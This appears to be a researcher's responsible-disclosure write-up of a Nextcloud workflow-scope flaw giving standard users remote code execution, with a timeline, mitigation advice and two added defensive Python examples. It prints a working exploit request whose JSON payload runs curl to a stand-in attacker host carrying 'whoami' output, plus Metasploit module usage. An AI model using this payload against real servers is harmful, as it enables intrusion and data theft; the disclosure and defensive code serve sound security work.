Nextcloud Workflows Remote Code Execution


Introduction

Nextcloud is an open-source platform used by many organizations, including enterprises, universities, and governments, for file synchronization and team collaboration. It is a self-hosted solution. In February 2023, while examining Nextcloud’s automation apps, Armend, Arjanit, and I identified a critical vulnerability. Any user with a standard account could execute arbitrary commands on the server without requiring administrative privileges.

The issue was a missing validation in the Workflow Engine, allowing regular users to create workflows intended for administrators. Combined with the "External Scripts" app, this led to remote code execution (RCE). We reported this through Nextcloud’s bug bounty program, and it has been resolved.

How It Began

We investigated how Nextcloud manages automated workflows, which activate when events like file creation, renaming, or sharing occur. These workflows can tag files, initiate HTTP requests, or execute shell commands if the appropriate app is enabled.

We focused on the "Workflow External Scripts" app, which allows workflows to run shell commands on the server—a feature meant for administrators only. However, testing revealed that the API did not enforce this restriction.

Nextcloud provides two API endpoints for workflows:

  • /ocs/v2.php/apps/workflowengine/api/v1/workflows/global — for administrator-only workflows
  • /ocs/v2.php/apps/workflowengine/api/v1/workflows/user — for regular users

We asked a simple question: What happens if a normal user uses the /global endpoint to register an operation class that’s meant only for admins?

Turns out: it works.


The Vulnerability

The flaw was a scope validation error in the /user workflows API. Any authenticated user could create a workflow using OCA\WorkflowScript\Operation, a class that permits arbitrary shell command execution. No filters prevented this.

Although the External Scripts app was designed for trusted administrator use, the API allowed any user to create a workflow with it, bypassing restrictions. The file event (e.g., postCreate) triggered the workflow. The core issue was that users could insert unrestricted shell commands.

Exploitation Steps

The process was as follows:

  1. Log in as a non-administrator user.
  2. Ensure the "Workflow External Scripts" app is enabled.
  3. Send a POST request to:
    POST /ocs/v2.php/apps/workflowengine/api/v1/workflows/user?format=json
  4. Include a JSON payload like this:
    {
      "id": -1676457965831,
      "class": "OCA\\WorkflowScript\\Operation",
      "entity": "OCA\\WorkflowEngine\\Entity\\File",
      "events": ["\\OCP\\Files::postCreate"],
      "name": "",
      "checks": [{
        "class": "OCA\\WorkflowEngine\\Check\\FileName",
        "operator": "!is",
        "value": "ignore.txt"
      }],
      "operation": "curl https://attacker.site/log?q=`whoami`",
      "valid": true
    }
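The check that was missing, modelled in Python as an added example (this is not Nextcloud's code and does not reproduce its PHP API). The two endpoint paths and the OCA\WorkflowScript\Operation class come from the page; the scope names, the hypothetical OCA\Example\NotifyOperation class, the sample payload, and the function names are assumptions made for the example. The point it shows is that the endpoint's scope, not the caller's privilege alone, must decide which operation classes are accepted.

```python
import json
from urllib.parse import urlsplit

SCOPE_ADMIN = "admin"
SCOPE_USER = "user"

# Scopes in which each operation class may be registered. The shell-command
# class is the one named on the page; OCA\Example\NotifyOperation is a
# hypothetical, user-safe operation included only so the allow-list has a
# user-scope entry. Any class absent from this table is denied in every scope.
OPERATION_SCOPES = {
    "OCA\\WorkflowScript\\Operation": {SCOPE_ADMIN},
    "OCA\\Example\\NotifyOperation": {SCOPE_ADMIN, SCOPE_USER},
}

# The two endpoint paths from the page, mapped to the scope each one serves.
ENDPOINT_SCOPES = {
    "/ocs/v2.php/apps/workflowengine/api/v1/workflows/global": SCOPE_ADMIN,
    "/ocs/v2.php/apps/workflowengine/api/v1/workflows/user": SCOPE_USER,
}

GLOBAL_URL = "/ocs/v2.php/apps/workflowengine/api/v1/workflows/global?format=json"
USER_URL = "/ocs/v2.php/apps/workflowengine/api/v1/workflows/user?format=json"

# Constructed payload in the shape shown on the page (command kept harmless).
SHELL_PAYLOAD = json.dumps({
    "id": -1,
    "class": "OCA\\WorkflowScript\\Operation",
    "entity": "OCA\\WorkflowEngine\\Entity\\File",
    "events": ["\\OCP\\Files::postCreate"],
    "name": "",
    "checks": [{"class": "OCA\\WorkflowEngine\\Check\\FileName",
                "operator": "!is", "value": "ignore.txt"}],
    "operation": "whoami",
    "valid": True,
})


def is_allowed(op_class, scope):
    """True only when op_class is explicitly permitted in scope."""
    return scope in OPERATION_SCOPES.get(op_class, set())


def check_request(url, body, is_admin):
    """Decide whether a workflow-creation request may proceed.

    Returns (accepted, reason). Two independent checks are applied: the
    caller must hold the privilege the endpoint is meant for, and the
    requested operation class must be available in the endpoint's scope.
    The second check is the one the vulnerable /user endpoint lacked.
    """
    path = urlsplit(url).path
    scope = ENDPOINT_SCOPES.get(path)
    if scope is None:
        return False, f"unknown endpoint {path}"
    if scope == SCOPE_ADMIN and not is_admin:
        return False, "global workflows require an administrator account"
    try:
        payload = json.loads(body)
    except json.JSONDecodeError as exc:
        return False, f"malformed JSON body: {exc}"
    op_class = payload.get("class")
    if not isinstance(op_class, str) or not is_allowed(op_class, scope):
        return False, f"operation class {op_class!r} is not available in {scope} scope"
    return True, "ok"


if __name__ == "__main__":
    # A regular user submitting the shell operation to the user endpoint is rejected.
    print(check_request(USER_URL, SHELL_PAYLOAD, is_admin=False))
    # The same operation sent to the global endpoint by an administrator is accepted.
    print(check_request(GLOBAL_URL, SHELL_PAYLOAD, is_admin=True))
```

Unknown operation classes are denied by default, so a newly installed workflow app has to be added to the table before its operation becomes available in any scope; that is the safer failure mode for an allow-list of this kind.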

Metasploit Integration

Recently this vulnerability was included in Rapid7’s Metasploit Framework, enabling testing in security assessments. Usage is as follows:

msf > use exploit/unix/webapp/nextcloud_workflows_rce
msf exploit(nextcloud_workflows_rce) > show targets
    ...targets...
msf exploit(nextcloud_workflows_rce) > set TARGET <target-id>
msf exploit(nextcloud_workflows_rce) > show options
    ...set options...
msf exploit(nextcloud_workflows_rce) > exploit

The module handles authentication, workflow injection, and command execution, requiring only a low-privileged user account.

As a team, we thank @whotwagner for contributing the Metasploit module for this vulnerability to Rapid7.


Why This Mattered

This was not a minor issue. It was a logic flaw that allowed low-privileged users to:

  • Create hidden workflows to execute shell commands
  • Maintain persistent server access
  • Run arbitrary payloads, such as reverse shells

The postCreate trigger could be replaced with events like postRename or postShare. The primary issue was allowing regular users to access privileged operations.
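Because the workflows created this way persist on the server, an administrator auditing an instance wants to list every shell-command workflow and flag those that are not admin-scoped, whatever event they hook. The following audit is an added example, not part of the original post or of Nextcloud: it models the workflow engine's storage with two SQLite tables and runs the query over constructed rows. The table and column names, the scope encoding (0 for admin, 1 for a user-owned workflow), and the sample data are assumptions made for the example; verify them against your own instance's schema before adapting the query.

```python
import sqlite3

SHELL_OPERATION_CLASS = "OCA\\WorkflowScript\\Operation"

# Assumed encoding of a scope row: 0 = admin (global) workflow, 1 = workflow
# owned by the user named in `value`.
SCOPE_TYPE_ADMIN = 0
SCOPE_TYPE_USER = 1

# Simplified stand-in for the workflow engine tables (assumed layout; table
# and column names are not taken from any Nextcloud release).
SCHEMA = """
CREATE TABLE oc_flow_operations (
    id        INTEGER PRIMARY KEY,
    class     TEXT NOT NULL,
    name      TEXT,
    entity    TEXT,
    events    TEXT,
    operation TEXT
);
CREATE TABLE oc_flow_operations_scope (
    id           INTEGER PRIMARY KEY,
    operation_id INTEGER NOT NULL,
    type         INTEGER NOT NULL,
    value        TEXT
);
"""

FILE_ENTITY = "OCA\\WorkflowEngine\\Entity\\File"

# Constructed sample data: one legitimate admin-scoped script, two user-scoped
# shell workflows on different events (the pattern this bug made possible),
# and one harmless user workflow using a hypothetical non-shell operation.
SAMPLE_OPERATIONS = [
    (1, SHELL_OPERATION_CLASS, "nightly archive", FILE_ENTITY,
     '["\\\\OCP\\\\Files::postCreate"]', "/usr/local/bin/archive.sh %f"),
    (2, SHELL_OPERATION_CLASS, "", FILE_ENTITY,
     '["\\\\OCP\\\\Files::postCreate"]', "id > /tmp/marker"),
    (3, SHELL_OPERATION_CLASS, "", FILE_ENTITY,
     '["\\\\OCP\\\\Files::postRename"]', "id > /tmp/marker2"),
    (4, "OCA\\Example\\NotifyOperation", "notify me", FILE_ENTITY,
     '["\\\\OCP\\\\Files::postShare"]', "mail"),
]
SAMPLE_SCOPES = [
    (1, 1, SCOPE_TYPE_ADMIN, ""),
    (2, 2, SCOPE_TYPE_USER, "alice"),
    (3, 3, SCOPE_TYPE_USER, "bob"),
    (4, 4, SCOPE_TYPE_USER, "carol"),
]


def load_sample_db():
    """Build an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO oc_flow_operations VALUES (?, ?, ?, ?, ?, ?)",
                     SAMPLE_OPERATIONS)
    conn.executemany("INSERT INTO oc_flow_operations_scope VALUES (?, ?, ?, ?)",
                     SAMPLE_SCOPES)
    conn.commit()
    return conn


def list_shell_workflows(conn):
    """Every workflow using the shell-command operation, labelled by scope, for review."""
    sql = """
        SELECT o.id,
               CASE WHEN s.type = ? THEN 'admin' ELSE 'user' END AS scope,
               s.value, o.events, o.operation
        FROM oc_flow_operations AS o
        JOIN oc_flow_operations_scope AS s ON s.operation_id = o.id
        WHERE o.class = ?
        ORDER BY o.id
    """
    return conn.execute(sql, (SCOPE_TYPE_ADMIN, SHELL_OPERATION_CLASS)).fetchall()


def find_user_scoped_shell_workflows(conn):
    """Shell workflows whose scope is not admin: findings to investigate.

    With scope validation in place this query should return nothing; any hit
    is either a leftover from before the fix or a sign the check is bypassed.
    """
    sql = """
        SELECT o.id, s.value, o.events, o.operation
        FROM oc_flow_operations AS o
        JOIN oc_flow_operations_scope AS s ON s.operation_id = o.id
        WHERE o.class = ? AND s.type <> ?
        ORDER BY o.id
    """
    return conn.execute(sql, (SHELL_OPERATION_CLASS, SCOPE_TYPE_ADMIN)).fetchall()


if __name__ == "__main__":
    db = load_sample_db()
    for row in list_shell_workflows(db):
        print("shell workflow:", row)
    for op_id, owner, events, command in find_user_scoped_shell_workflows(db):
        print(f"FINDING: workflow {op_id} owned by {owner!r} on {events} runs {command!r}")
```

The finding query deliberately keys on the operation class rather than on the event name, so workflows hooked to postRename, postShare or any other trigger are caught the same way as postCreate ones; the review listing is there so the remaining admin-scoped scripts get a second look as well.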

Disclosure Timeline

  • February 15, 2023 Vulnerability identified
  • February 16, 2023 Reported via Nextcloud’s bug bounty program
  • February 20, 2023 Nextcloud confirmed the issue
  • March 30, 2023 Validation added to restrict workflow scope

Conclusion

Nextcloud assumed user workflows would be limited but failed to enforce this, enabling full RCE from standard accounts. We commend the Nextcloud team for their prompt response and resolution.

For those managing a Nextcloud instance:

  • Review all installed workflow apps
  • Disable or restrict the "External Scripts" app unless essential
  • Ensure the system is updated

Disclosed responsibly through the Nextcloud bug bounty program.